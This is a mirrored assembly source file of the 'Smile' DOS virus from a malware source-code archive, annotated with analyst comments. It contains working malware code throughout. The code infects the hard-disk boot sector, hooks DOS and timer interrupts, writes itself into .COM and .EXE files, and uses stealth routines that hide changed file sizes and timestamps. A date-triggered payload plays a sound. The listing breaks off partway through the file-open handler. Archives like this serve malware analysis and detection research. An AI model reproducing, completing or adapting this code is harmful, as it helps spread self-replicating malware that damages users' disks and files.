mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 12:25:29 +00:00
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Virus Name: Smile
|
|||
|
; Origin: Holland
|
|||
|
; Eff Length: 4,096 bytes
|
|||
|
; Type Code: PRhE - Parasitic Resident .EXE & partition table infector
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This program is assembled with TASM V1.01 from Borland International
|
|||
|
; (assembling with MASM V5.10 from Microsoft Inc. is also possible).
|
|||
|
;
|
|||
|
; TASM smile;
|
|||
|
; LINK smile,,smile;
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Interrupt vectors
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Absolute segment at 0000h. It only gives names to three slots of the
; real-mode interrupt vector table (offset word followed by segment word)
; so the code below can read and rewrite them symbolically.
; Analyst note: vectors 08h, 1Ch and 21h are the ones this sample replaces;
; a changed value in any of these slots is the resident hook.
iseg            segment at 0
                org     8*4
Int8o           dw      0                       ; interrupt vector 08h, offset word
Int8s           dw      0                       ; interrupt vector 08h, segment word

                org     1ch*4
Int1Co          dw      0                       ; interrupt vector 1Ch, offset word
Int1Cs          dw      0                       ; interrupt vector 1Ch, segment word

                org     21h*4
Int21o          dw      0                       ; interrupt vector 21h, offset word
Int21s          dw      0                       ; interrupt vector 21h, segment word

iseg            ends
|
|||
|
|
|||
|
cseg            segment public 'code'
                assume  cs:cseg,ds:cseg,es:cseg

;------------------------------------------------------------------------------
;
; Header of EXE-file
;
;------------------------------------------------------------------------------
;
; The 15 words below are the first data in cseg (offset 0). ReadHeader and
; WriteHeader transfer 1Eh bytes at DS:0, i.e. exactly these words when
; DS = cseg, so this area doubles as the I/O buffer for a file's MZ header.
; Analyst note: in a file written by this code the header carries
; HeaderSize = 0 and CheckSum = 0DEADh (see UpdateHeader); the Open handler
; tests the same two fields to recognise an already-modified file.

VirusSize       equ     1580h                   ; size of virus (5504 bytes);
                                                ; this one is very important,
                                                ; if it isn't set right the
                                                ; virus will hang every
                                                ; infected file

PrgSize         equ     73h                     ; size of prg after the virus
                                                ; this is used in the header
                                                ; of the dummy program

                                                ; the value of these constants
                                                ; can be determined by creating
                                                ; a map-file with the linker.

Signature       dw      0                       ; signature 'MZ'
PartPage        dw      0                       ; size of partial (last) page
PageCount       dw      0                       ; number of pages
ReloCount       dw      0                       ; number of relocation items
HeaderSize      dw      0                       ; size of header (added to a segment
                                                ; value in ExeFile, so in paragraphs)
MinMem          dw      0                       ; minimum memory needed
MaxMem          dw      0                       ; maximum memory needed
ExeSS           dw      0                       ; initial SS
ExeSP           dw      0                       ; initial SP
CheckSum        dw      0                       ; used as marker: set to 0DEADh
                                                ; by UpdateHeader
ExeIP           dw      0                       ; initial IP
ExeCS           dw      0                       ; initial CS
ReloOffset      dw      0                       ; offset of relocation table
OverlayNr       dw      0                       ; number of overlay

ComSize         dw      -1                      ; size of com-file (-1 for exe);
                                                ; not an MZ field, but stored and
                                                ; transferred with the header
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; This procedure is called when starting from an exe-file
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Main - entry point named by ExeIP in a modified file's header.
; Builds an IRET frame on the stack (flags pushed, 4 bytes reserved for the
; far return address), then branches on ComSize to prepare the hand-over to
; the original program. After the three register pushes the frame is:
;   [sp+0]=es  [sp+2]=ds  [sp+4]=ax  [sp+6]=ip slot  [sp+8]=cs slot  [sp+10]=flags
; The COM path runs straight into InfectBoot with:
;   bx = source segment of the host image, cx = paragraphs to move,
;   bp = stack segment for the host, es = scratch buffer segment, ds = cs.
Main:           pushf                           ; save flags
                sub     sp,4                    ; reserve space for far cs:ip
                push    ax                      ; save other registers
                push    ds
                push    es
                sti                             ; enable interrupts
                cmp     cs:ComSize,-1           ; com or exe-file
                je      ExeFile                 ; -1 : exe-file
ComFile:        mov     word ptr ds:[6],0fef0h  ; set available memory to max
                                                ; (word at offset 6 of the segment in
                                                ; DS; presumably the PSP - confirm)
                mov     bp,sp                   ; set cs:ip on stack for
                mov     word ptr [bp+8],ds      ; returning to the original
                mov     word ptr [bp+6],100h    ; program (ds:0100h)
                mov     bp,ds                   ; bp : stacksegment
                mov     ax,cs                   ; bx : begin of com-file, i.e. the
                add     ax,(VirusSize/10h)      ; paragraph right after the virus
                mov     bx,ax
                mov     cx,0ff0h                ; cx : size of data to move (paragraphs)
                add     ax,cx                   ; es : buffer for mover and
                mov     es,ax                   ; infecting the bootsect.
                push    cs                      ; ds : codesegment
                pop     ds
                jmp     short InfectBoot        ; infect bootsector
|
|||
|
; ExeFile - EXE branch of Main.
; DS is pointed VirusSize/10h paragraphs above CS, so the header field names
; (ReloCount, HeaderSize, ...) read the copy of the host's own header that
; UpdateHeader expects at file offset VirusSize. The code then
;   1. applies the host's relocation table itself, using CS as the relocation
;      factor (the host image is later copied down to CS:0 by Mover),
;   2. stores the host's entry point in the cs:ip slots reserved by Main,
;   3. derives the move parameters and falls through into InfectBoot.
; Out: bx = source segment, cx = paragraphs to move, bp = host stack segment,
;      es = scratch buffer segment, ds = cs.
ExeFile:        mov     dx,cs                   ; Relocation
                add     dx,(VirusSize/10h)
                mov     ds,dx                   ; ds:0 = host's original header
                mov     cx,ReloCount            ; number of relocation items
                add     dx,HeaderSize           ; size of exe-header -> dx = segment
                                                ; where the host image starts
                mov     si,ReloOffset           ; offset of 1st relocation item
                jcxz    NoRelo
NextRelo:       lodsw                           ; offset
                mov     di,ax
                lodsw                           ; segment
                add     ax,dx                   ; relative to start of host image
                mov     es,ax
                mov     ax,cs                   ; relocation factor
                add     es:[di],ax
                loop    NextRelo                ; next relocation item
NoRelo:         mov     bp,sp
                mov     ax,cs                   ; set cs:ip on stack for
                add     ax,ExeCS                ; returning to the original
                mov     [bp+8],ax               ; program
                mov     ax,ExeIP
                mov     [bp+6],ax
                mov     bp,cs                   ; bp : stacksegment
                add     bp,ExeSS
                mov     ax,PageCount            ; calculate size of exe-file
                mov     dx,PartPage             ; in paragraphs
                add     dx,-1                   ; CF=1 unless PartPage was 0
                sbb     ax,0                    ; drop the partial page from the count
                mov     cl,4
                shr     dx,cl                   ; bytes of last page -> paragraphs
                inc     dx
                inc     cl                      ; cl = 5
                shl     ax,cl                   ; pages * 32 paragraphs
                add     dx,ax
                add     dx,MinMem               ; dx : size of exe-file
                mov     cx,dx                   ; cx : size of code and data
                sub     cx,HeaderSize
                mov     bx,cs                   ; bx : start of code and data
                mov     ds,bx                   ; ds = cs again
                add     bx,(VirusSize/10h)
                add     bx,dx
                mov     es,bx                   ; es : buffer for mover and
                sub     bx,cx                   ; infecting the bootsect.
|
|||
|
; InfectBoot - reached from both branches of Main with ds = cs and
; es = scratch buffer segment; bx/cx (move parameters) are preserved.
; Steps, all through BIOS int 13h on drive 80h, cylinder 0, head 0:
;   1. read sector 1 into es:0; give up on error
;   2. give up if its first BootSize bytes already equal the BootSector stub
;   3. give up if any of the 4 partition entries starts inside the sectors
;      that are about to be overwritten
;   4. swap the first BootSize bytes of the sector with the stub, so the
;      body in memory now carries the original boot code
;   5. write the body (VirusSize rounded up to sectors) starting at sector 2
;   6. write the patched sector back to sector 1
; Afterwards (BootOk) the Mover routine is copied to es:0 and entered with a
; far return; registers for it: bx = source seg, dx = destination seg (cs),
; cx = paragraph count, bp = new SS.
; Analyst note: with VirusSize = 1580h, (VirusSize+1ffh)/200h is 11, so the
; on-disk footprint is sector 1 (modified code, partition table untouched)
; plus sectors 2..12 of cylinder 0, head 0 on the first fixed disk.
InfectBoot:     push    bx                      ; save bx and cx
                push    cx
                mov     ax,201h                 ; read bootsector from disk
                xor     bx,bx                   ; (ah=02h read, al=1 sector, es:bx=buffer)
                mov     cx,1                    ; cylinder 0, sector 1
                mov     dx,80h                  ; head 0, drive 80h
                int     13h
                jc      BootOk                  ; error ?
                mov     si,offset BootSector    ; compare with infected code
                xor     di,di
                mov     cx,1*BootSize
                cld
                repe    cmpsb
                je      BootOk                  ; equal ? then already present
                mov     di,1beh+8               ; check partitions, we don't
                mov     cx,4                    ; want to overwrite them
                                                ; (di = dword at +8 of each 10h-byte
                                                ; entry: its starting sector)
NextPartition:  cmp     word ptr es:[di+2],0    ; high word set -> far away
                ja      SectOk
                cmp     word ptr es:[di],(VirusSize+1ffh)/200h+1
                ja      SectOk                  ; starts beyond the area to be used
                cmp     word ptr es:[di],0
                ja      BootOk                  ; non-zero start inside the area: abort
SectOk:         add     di,10h
                loop    NextPartition
                mov     si,offset BootSector    ; exchange code from bootsector
                xor     di,di                   ; with viral code
                mov     cx,1*BootSize
                cld
                call    Swapsb
                push    es                      ; write virus to disk
                pop     ds                      ; ds = buffer, es = cs
                push    cs
                pop     es
                mov     ax,(VirusSize+1ffh)/200h+300h   ; ah=03h write, al=sector count
                mov     cx,2                    ; starting at sector 2 (bx, dx unchanged)
                int     13h
                push    ds                      ; restore es = buffer, ds = cs
                pop     es
                push    cs
                pop     ds
                jc      BootOk                  ; error ? (flags survive the push/pop)
                mov     ax,301h                 ; write bootsector to disk
                mov     cx,1
                int     13h
BootOk:         pop     cx                      ; restore bx and cx
                pop     bx
                mov     dx,cs                   ; dx = destination segment
                xor     di,di
                push    es                      ; push seg:ofs of mover
                push    di
                push    cx                      ; save cx
                mov     cx,1*MoverSize
                mov     si,offset Mover
                cld                             ; copy mover-procedure
                rep     movsb
                pop     cx                      ; restore cx
                cli                             ; disable interrupts
                retf                            ; jump to mover
|
|||
|
|
|||
|
; Mover - position-independent copy loop; InfectBoot copies these MoverSize
; bytes to the scratch buffer and enters them with interrupts disabled.
; In:  bx = source segment, dx = destination segment, cx = paragraphs to
;      copy, bp = stack segment for the original program; the stack still
;      holds the frame built in Main (es, ds, ax, ip, cs, flags).
; Copies 16 bytes per iteration, advancing both segments by one paragraph,
; then switches SS (SP is left unchanged), restores the saved registers and
; leaves through IRET into the original program.
Mover:          mov     ax,cx                   ; save cx
                mov     ds,bx                   ; ds:si = source
                mov     es,dx                   ; es:di = destination
                xor     si,si
                xor     di,di
                mov     cx,8h                   ; copy one paragraph
                rep     movsw
                inc     bx
                inc     dx
                mov     cx,ax                   ; restore cx
                loop    Mover                   ; next paragraph
                mov     ss,bp                   ; ss = new stacksegment
                sti                             ; enable interrupts
                pop     es                      ; restore registers
                pop     ds
                pop     ax
                iret                            ; jump to program

MoverSize       equ     ($-Mover)               ; bytes copied by InfectBoot
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Bootsector startup
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Bootsector - the BootSize-byte stub that InfectBoot swaps into the start
; of sector 1; it sets SP to 7c00h and StartUp later jumps to 0:7c00h, the
; address it expects to have been loaded at.
; It lowers the BIOS base-memory word at 0:413h by the size of the body in
; KB, converts the new value to a segment (KB * 64), reads the body from
; sector 2 onwards into that segment and continues at StartUp there.
; Analyst note: (VirusSize+3ffh)/400h is 6 for VirusSize = 1580h, so a
; machine booted through this stub reports 6 KB less conventional memory
; than installed; the hidden block sits at the top of base memory.
Bootsector:     cli                             ; disable interrupts
                xor     bx,bx                   ; setup stack and ds
                mov     ds,bx
                mov     ss,bx
                mov     sp,7c00h
                sti                             ; enable interrupts
                mov     ax,ds:[413h]            ; get size of base memory
                sub     ax,(VirusSize+3ffh)/400h; subtract virussize
                mov     ds:[413h],ax            ; store new memory size
                mov     cl,6                    ; calculate segment
                shl     ax,cl
                mov     es,ax                   ; load virus in reserved mem
                mov     ax,(VirusSize+1ffh)/200h+200h   ; ah=02h read, al=sector count
                mov     cx,2                    ; cylinder 0, sector 2
                mov     dx,80h                  ; head 0, drive 80h
                int     13h                     ; es:bx (bx=0) = destination
                mov     bx,offset StartUp       ; bx=offset startup
                push    es                      ; jump to startup (es:bx)
                push    bx
                retf

BootSize        equ     ($-Bootsector)          ; size of bootsector part
|
|||
|
|
|||
|
; StartUp - runs in the reserved memory block right after the boot stub.
; In:  ds = 0 (set by Bootsector), cs = segment of the loaded body.
; Hooks interrupt 1Ch (saving the previous vector), marks the saved int 21h
; vector and the tick counter as "not yet seen" (-1), then swaps the first
; BootSize bytes at 0:7c00h with the bytes kept at cs:BootSector - which
; puts the original boot code back in place - and jumps to 0:7c00h so the
; machine continues booting normally.
StartUp:        cli                             ; disable interrupts
                mov     ax,offset Interrupt1C   ; hack interrupt 1C
                xchg    ax,ds:Int1Co
                mov     cs:OldInt1Co,ax
                mov     ax,cs
                xchg    ax,ds:Int1Cs
                mov     cs:OldInt1Cs,ax
                mov     cs:OldInt21o,-1         ; no int 21h vector recorded yet
                mov     cs:OldInt21s,-1
                mov     cs:Count,-1
                sti                             ; enable interrupts
                push    cs                      ; es=cs
                pop     es
                mov     si,7c00h                ; si=7c00h (bootsector in memory)
                mov     di,offset BootSector    ; di=BootSector (saved original code)
                mov     cx,1*BootSize           ; bytes to copy
                cld                             ; copy forward
                call    Swapsb                  ; restore original boot
                mov     ax,7c00h                ; offset bootsector
                push    ds                      ; jump to bootsector (ds = 0)
                push    ax
                retf
|
|||
|
|
|||
|
; Interrupt8 - temporary timer-interrupt handler installed by DosVersion
; while the sound sample is played.
; Each tick outputs one bit of SampleData through port 61h: SampleBit counts
; the bits within a byte, SampleOffset is the current byte, and the byte is
; rotated left so the next bit arrives in bit 0. When SampleOffset reaches
; SampleEnd the handler restores the timer reload value and the saved int 8
; vector and raises SampleFlag, which ends the wait loop in DosVersion.
; The previous int 8 handler is not called while this one is installed; the
; handler acknowledges the interrupt itself (20h to port 20h).
; SampleOffset, SampleBit, SampleFlag, SampleEnd and OldInt8o/OldInt8s are
; defined outside this excerpt.
Interrupt8:     push    ax                      ; save registers
                push    si
                push    ds
                push    cs
                pop     ds
                mov     si,SampleOffset         ; get offset of next bit
                dec     byte ptr ds:SampleBit
                test    byte ptr ds:SampleBit,7 ; all 8 bits of this byte done ?
                jnz     OfsOk
                inc     si                      ; yes, next byte
                cmp     si,offset SampleEnd     ; end of sample ?
                jb      OfsOk                   ; no, play bit
                mov     al,34h                  ; reset int 8 frequency
                out     43h,al
                xor     ax,ax                   ; reload value 0000h, low then high byte
                out     40h,al
                out     40h,al
                mov     ds,ax                   ; reset int 8 vector
                mov     ax,cs:OldInt8o
                mov     ds:Int8o,ax
                mov     ax,cs:OldInt8s
                mov     ds:Int8s,ax
                inc     byte ptr cs:SampleFlag  ; set sample ready flag
                jmp     short ExitInt8          ; end of interrupt
OfsOk:          mov     SampleOffset,si         ; store offset
                rol     byte ptr ds:[si],1      ; next bit
                mov     ah,ds:[si]              ; get bit value
                and     ah,1
                shl     ah,1                    ; move it to bit 1 (value 2)
                in      al,61h                  ; get value of io-port 61h
                and     al,0fch                 ; reset last 2 bits
                or      al,ah                   ; set bit 1 with sample value
                out     61h,al                  ; write to io-port 61h
ExitInt8:       mov     al,20h                  ; end of interrupt signal
                out     20h,al
                pop     ds                      ; restore registers
                pop     si
                pop     ax
                iret                            ; return to program
|
|||
|
|
|||
|
; Interrupt1C - timer-tick hook installed by StartUp (boot path only).
; Its job is to wait until the int 21h vector exists and has stopped
; changing, then take it over:
;   * every tick the current int 21h vector is compared with the saved copy;
;     any change is recorded and the countdown restarts at 182 ticks
;   * when 182 consecutive ticks pass without a change (about 10 seconds at
;     the default 18.2 Hz tick rate) the handler unhooks itself from 1Ch,
;     points int 21h at Interrupt21, zeroes 16 bytes at Handle and sets
;     Active to -1
; Every invocation ends by jumping to the previous 1Ch handler through
; OldInt1C (defined outside this excerpt; presumably the dword formed by
; OldInt1Co/OldInt1Cs - confirm).
; Analyst note: after this point the int 21h vector points into the block
; hidden at the top of base memory rather than into DOS.
Interrupt1C:    push    ds                      ; save registers
                push    ax
                push    bx
                xor     ax,ax                   ; interrupt vectors
                mov     ds,ax
                mov     ax,ds:Int21o
                cmp     cs:OldInt21o,ax
                jne     Changed
                mov     ax,ds:Int21s
                cmp     cs:OldInt21s,ax
                je      Equal
Changed:        mov     ax,ds:Int21o            ; remember the new vector
                mov     cs:OldInt21o,ax
                mov     ax,ds:Int21s
                mov     cs:OldInt21s,ax
                mov     cs:Count,182            ; restart the countdown
                jmp     short NotReady
Equal:          dec     cs:Count
                jnz     NotReady
                mov     ax,cs:OldInt1Co         ; restore vector 1C
                mov     ds:Int1Co,ax            ; (This interrupt)
                mov     ax,cs:OldInt1Cs
                mov     ds:Int1Cs,ax
                mov     ax,offset Interrupt21   ; Hack interrupt 21
                xchg    ax,ds:Int21o
                mov     cs:OldInt21o,ax
                mov     ax,cs
                xchg    ax,ds:Int21s
                mov     cs:OldInt21s,ax
                mov     ax,16                   ; clear 16 bytes of the handle table
                mov     bx,offset Handle
NextHandle:     mov     byte ptr cs:[bx],0
                inc     bx
                dec     ax
                jnz     NextHandle
                mov     byte ptr cs:Active,-1
NotReady:       pop     bx
                pop     ax                      ; restore registers
                pop     ds
                jmp     cs:OldInt1C             ; do original int 1C
|
|||
|
|
|||
|
; Swapsb - exchange cx bytes between ds:si and es:di.
; In:    ds:si, es:di = the two buffers, cx = byte count (must be > 0),
;        direction flag clear (both callers execute CLD first)
; Out:   si, di advanced by the count, cx = 0
; Clobb: al
Swapsb:         mov     al,es:[di]              ; exchange two memory bytes
                xchg    al,ds:[si]
                stosb                           ; es:[di] = old ds:[si], di++
                inc     si
                loop    Swapsb                  ; next byte
                ret                             ; return
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; Manipulated functions
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; Dispatch table scanned by Interrupt21: FunctionCount entries of 3 bytes,
; each an int 21h function number (value of AH) followed by the offset of
; the replacement handler.
; Analyst note: this is the complete list of DOS services the resident code
; filters; every other function is passed to the previous handler untouched.
Functions       db      11h                     ; 1  FCB find first
                dw      offset FindFCB
                db      12h                     ; 2  FCB find next
                dw      offset FindFCB
                db      30h                     ; 3  get DOS version
                dw      offset DosVersion
                db      3ch                     ; 4  create file
                dw      offset Open
                db      3dh                     ; 5  open file
                dw      offset Open
                db      3eh                     ; 6  close file
                dw      offset Close
                db      42h                     ; 7  move file pointer
                dw      offset Seek
                db      45h                     ; 8  duplicate handle
                dw      offset Duplicate
                db      46h                     ; 9  force duplicate handle
                dw      offset Redirect
                db      4eh                     ; 10 find first
                dw      offset Find
                db      4fh                     ; 11 find next
                dw      offset Find
                db      5bh                     ; 12 create new file
                dw      offset Open
                db      6ch                     ; 13 extended open/create
                dw      offset OpenCreate

FunctionCount   equ     13                      ; number of entries above
|
|||
|
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
;
|
|||
|
; The original interrupt 21h is redirected to this procedure
|
|||
|
;
|
|||
|
;------------------------------------------------------------------------------
|
|||
|
|
|||
|
; DosVersion - replacement for int 21h function 30h; carries the audible
; payload. Entered through FunctionTrap with the caller's registers and the
; original interrupt frame intact; always ends by passing the request on to
; the previous int 21h handler (Old21).
; The payload is skipped when Active is 0, when ActiveYear is below the
; current year, or when ActiveDate is below the current month/day word
; (both compared unsigned against the result of function 2Ah).
; Otherwise: int 8 is redirected to Interrupt8, timer channel 0 is
; reprogrammed with reload value 0080h, the sample pointers are reset, and
; the code busy-waits until Interrupt8 raises SampleFlag; Active is then
; cleared so the sample is not played again.
; Active, ActiveYear and ActiveDate are defined outside this excerpt.
DosVersion:     push    ax
                push    cx
                push    dx
                push    ds
                push    cs
                pop     ds
                cmp     cs:Active,0
                je      NotActive
                mov     ah,2ah                  ; get date: cx=year, dh=month, dl=day
                call    DOS
                cmp     ActiveYear,cx
                jb      NotActive
                cmp     ActiveDate,dx
                jb      NotActive
                cli
                xor     ax,ax
                mov     ds,ax                   ; ds = 0: interrupt vectors
                mov     ax,offset Interrupt8    ; hook int 8, keep the old vector
                xchg    ax,ds:Int8o
                mov     cs:OldInt8o,ax
                mov     ax,cs
                xchg    ax,ds:Int8s
                mov     cs:OldInt8s,ax
                mov     al,34h                  ; same control byte Interrupt8 uses
                out     43h,al                  ; when it resets the frequency
                mov     al,80h                  ; reload value 0080h, low byte first
                out     40h,al
                mov     al,0
                out     40h,al
                push    cs
                pop     ds
                mov     byte ptr SampleFlag,0
                mov     byte ptr SampleBit,0
                mov     word ptr SampleOffset,offset SampleData
                sti
Delay:          cmp     byte ptr SampleFlag,0   ; wait until the sample has finished
                je      Delay
                mov     byte ptr Active,0
NotActive:      pop     ds
                pop     dx
                pop     cx
                pop     ax
                jmp     Old21
|
|||
|
|
|||
|
; FindFCB / Find - replacements for the directory-search functions
; (11h/12h and 4Eh/4Fh). Both run the real function first and then edit the
; result in the disk transfer area (address obtained with function 2Fh):
; if the seconds field of the file time (low 5 bits of the byte at +16h) is
; 1Fh, VirusSize is subtracted from the 32-bit file size and the seconds
; field is cleared, so the entry looks like the unmodified file.
; The two entry points differ only in the error test and in the offsets of
; the size field; FindFCB additionally skips 8 bytes for an extended FCB.
; Both return to the caller with RETF 2, i.e. with the flags produced here
; instead of the flags saved by the INT instruction.
; Analyst note: the seconds value 1Fh ("62 seconds", which no normal clock
; produces) is the on-disk marker written by UpdateHeader. While the code is
; resident, directory listings hide both the marker and the size increase;
; the timestamp and length are only trustworthy when read from a clean boot.
FindFCB:        call    DOS                     ; call original interrupt
                cmp     al,0                    ; error ?
                jne     Ret1
                pushf                           ; save registers
                push    ax
                push    bx
                push    es
                mov     ah,2fh                  ; get DTA
                call    DOS
                cmp     byte ptr es:[bx],-1     ; extended fcb ?
                jne     FCBOk
                add     bx,8                    ; yes, skip 8 bytes
FCBOk:          mov     al,es:[bx+16h]          ; get file-time (low byte)
                and     al,1fh                  ; seconds
                cmp     al,1fh                  ; 62 seconds ?
                jne     FileOk                  ; no, file not infected
                sub     word ptr es:[bx+1ch],VirusSize
                sbb     word ptr es:[bx+1eh],0  ; adjust file-size
                jmp     short Time

Find:           call    DOS                     ; call original interrupt
                jc      Ret1                    ; error ?
                pushf                           ; save registers
                push    ax
                push    bx
                push    es
                mov     ah,2fh                  ; get DTA
                call    DOS
                mov     al,es:[bx+16h]          ; get file-time (low byte)
                and     al,1fh                  ; seconds
                cmp     al,1fh                  ; 62 seconds ?
                jne     FileOk                  ; no, file not infected
                sub     word ptr es:[bx+1ah],VirusSize
                sbb     word ptr es:[bx+1ch],0  ; change file-size
Time:           xor     byte ptr es:[bx+16h],1fh; adjust file-time (clears the
                                                ; seconds field, known to be 1Fh)
FileOk:         pop     es                      ; restore registers
                pop     bx
                pop     ax
                popf
Ret1:           retf    2                       ; return
|
|||
|
|
|||
|
; Seek - replacement for int 21h function 42h (move file pointer).
; Handle 0 and handles that FindHandle does not know are passed straight to
; the previous handler. For a tracked handle the file is presented as if it
; did not contain the first VirusSize bytes: an absolute position (AL = 0)
; is shifted up by VirusSize before the real call, and VirusSize is
; subtracted from the position returned in dx:ax.
; Returns through Ret1 (RETF 2), so the carry flag of the real call reaches
; the caller.
Seek:           or      bx,bx                   ; bx=0 ?
                jz      Old21                   ; yes, do original interrupt
                push    bx
                call    FindHandle              ; CF set when the handle is not tracked
                pop     bx
                jc      Old21
Stealth:        or      al,al                   ; seek from top of file ?
                jnz     Relative                ; no, don't change cx:dx
                add     dx,VirusSize            ; change cx:dx
                adc     cx,0
Relative:       call    DOS                     ; Execute original int 21h
                jc      Ret1                    ; Error ?
                sub     ax,VirusSize            ; adjust dx:ax
                sbb     dx,0
                jmp     short Ret1              ; return
|
|||
|
|
|||
|
; Close - replacement for int 21h function 3Eh.
; If the handle is in the handle table its slot is released (handle word set
; to 0). When the slot's flag byte is non-zero - the value 1 is stored by the
; Open handler for a file that was created empty and received a copy of the
; body - UpdateHeader is called to finish the file before it is closed.
; In every case the request is then forwarded to the previous handler.
Close:          or      bx,bx                   ; bx=0 ?
                je      Old21                   ; yes, do original interrupt
                push    ax
                push    cx
                push    dx
                push    si
                push    ds
                push    cs                      ; ds=cs
                pop     ds
                push    bx
                call    FindHandle
                mov     si,bx                   ; si = table slot (valid when CF clear)
                pop     bx
                jc      DoNotUpdate             ; handle not tracked
                mov     word ptr ds:[si],0      ; free the slot
                cmp     byte ptr ds:[si+2],0    ; flag byte 0 -> nothing to finish
                je      DoNotUpdate
                call    UpdateHeader
DoNotUpdate:    pop     ds                      ; restore registers
                pop     si
                pop     dx
                pop     cx
                pop     ax
Not2:           jmp     short Old21             ; continue with original int
|
|||
|
|
|||
|
; Interrupt21 - the resident int 21h filter.
; Looks AH up in the Functions table. Unlisted functions continue at the
; previous handler through OldInt21 (defined outside this excerpt;
; presumably the dword formed by OldInt21o/OldInt21s - confirm).
; For a listed function, FunctionTrap rewrites the two stack slots that hold
; the saved bx and cx so that a POPF / near RET pair restores the caller's
; flags and jumps to the handler, leaving bx, cx, bp and the original
; interrupt frame exactly as they were at entry.
; Stack seen by FunctionTrap after "mov bp,sp":
;   [bp]=bp  [bp+2]=saved cx  [bp+4]=saved bx  [bp+6]=ip  [bp+8]=cs  [bp+10]=flags
Interrupt21:    push    bx                      ; after an int 21h instruction
                push    cx                      ; this procedure is started
                mov     bx,offset Functions
                mov     cx,FunctionCount
NxtFn:          cmp     ah,cs:[bx]              ; search function
                je      FunctionTrap
                add     bx,3                    ; next 3-byte entry
                loop    NxtFn
                pop     cx                      ; function not found
                pop     bx
Old21:          jmp     cs:OldInt21

FunctionTrap:   push    bp                      ; function found, start viral
                mov     bp,sp                   ; version of function
                mov     bx,cs:[bx+1]            ; handler offset from the table
                xchg    bx,[bp+4]               ; bx restored, slot = handler offset
                mov     cx,[bp+10]              ; caller's flags
                xchg    cx,[bp+2]               ; cx restored, slot = flags copy
                pop     bp
                popf                            ; caller's flags back in effect
                ret                             ; near return = jump to the handler
|
|||
|
|
|||
|
; Duplicate - replacement for int 21h function 45h (duplicate handle).
; Runs the real function; if the source handle (bx) is in the handle table,
; the new handle returned in ax is stored in a free slot with the same flag
; byte, so the duplicate is tracked like the original.
; Returns the result of the real call through Ret2 (RETF 2).
Duplicate:      call    DOS
                jc      Error
                pushf
                push    bx
                push    dx
                call    FindHandle              ; look up the source handle
                jc      Ret3                    ; not tracked
                mov     dl,cs:[bx+2]            ; copy its flag byte
                mov     bx,ax                   ; bx = new handle
                call    StoreHandle
Ret3:           pop     dx
                pop     bx
                popf
                jmp     Ret2
|
|||
|
|
|||
|
; Redirect - replacement for int 21h function 46h (force duplicate handle).
; Runs the real function; afterwards, if the handle passed in cx is found in
; the handle table, the handle word of that slot is overwritten with the
; handle passed in bx. bx and cx are returned unchanged; the result of the
; real call is returned through Ret2 (RETF 2).
Redirect:       call    DOS
                jc      Error
                pushf
                push    bx
                push    cx
                xchg    bx,cx                   ; bx = handle from cx, cx = handle from bx
                call    FindHandle
                jc      Ret4                    ; not tracked
                mov     cs:[bx],cx
Ret4:           pop     cx
                pop     bx
                popf
                jmp     Ret2
|
|||
|
|
|||
|
; OpenCreate / Open - replacements for int 21h functions 6Ch (only AL = 0)
; and 3Ch, 3Dh, 5Bh. Names that CheckName does not accept as .COM or .EXE
; go to the previous handler untouched. Otherwise the real function is run
; and, if it succeeded and the handle is a file rather than a character
; device, one of two things happens:
;
;   FileCreated (file length is 0, and a table slot is free):
;     the current date plus three months is stored in ActiveYear/ActiveDate,
;     VirusSize bytes starting at ds:0 (ds = cs) are written to the file,
;     and the handle is stored with flag 1 so that Close calls UpdateHeader.
;
;   FileExists (file has content, and a table slot is free):
;     the first 1Eh bytes are read into the header area at ds:0. If they
;     show 'MZ', HeaderSize = 0 and CheckSum = 0DEADh, the handle is stored
;     with flag 0 and the file pointer is placed at VirusSize, so that reads
;     start at the original content; otherwise the pointer goes back to 0.
;
; The caller receives the handle and flags of the real call (RETF 2).
; Analyst note: the three header values tested under FileExists are the
; file-content signature of a modified file; together with the Seek and
; Find handlers this is what makes a modified file read back as clean while
; the code is resident.
OpenCreate:     or      al,al                   ; extended open/create function
                jne     Old21                   ; no, do original interrupt 21
                push    dx                      ; save dx
                mov     dx,si                   ; check extension of filename
                call    CheckName               ; (name pointer is in si here)
                pop     dx                      ; restore dx
                jc      Old21                   ; exe or com-file?
                jmp     short ExtensionOk       ; yes, infect file or use
                                                ; stealth

Open:           call    CheckName               ; exe or com-file ?
                jc      Old21                   ; no, do original int 21
ExtensionOk:    call    DOS                     ; do interrupt 21
                jnc     NoError                 ; error ?
Error:          jmp     Ret2                    ; yes, return and do nothing
NoError:        pushf                           ; save registers
                push    ax
                push    bx
                push    cx
                push    dx
                push    ds
                push    cs
                pop     ds
                mov     bx,ax                   ; bx = file handle
                mov     ax,4400h                ; get device information
                call    DOS
                jc      PopRet                  ; error ?
                test    dx,80h                  ; character device
                jnz     PopRet                  ; yes, return and do nothing
                call    EndOfFile               ; get file size
                or      ax,dx                   ; 0 ?
                jnz     FileExists              ; no, file already existed
FileCreated:    call    HandleFree              ; free table slot available ?
                jc      PopRet
                mov     ah,2ah                  ; get date: cx=year, dh=month, dl=day
                call    DOS
                add     dh,3                    ; three months ahead
                cmp     dh,12
                jbe     DateOk
                inc     cx                      ; wrap into the next year
                sub     dh,12
DateOk:         mov     ActiveYear,cx
                mov     ActiveDate,dx
                mov     ah,40h                  ; write virus to file
                mov     cx,VirusSize
                call    Zero2                   ; dx = 0, then the real int 21h
                jc      NoVir                   ; error ? yes, return
                xor     ax,cx                   ; entire virus written ?
                jnz     NoVir                   ; no, return
                mov     dl,1                    ; flag 1: header still to be written
                call    StoreHandle
                jmp     short PopRet            ; return
FileExists:     call    TopOfFile               ; go to top of file
                call    HandleFree              ; free table slot available ?
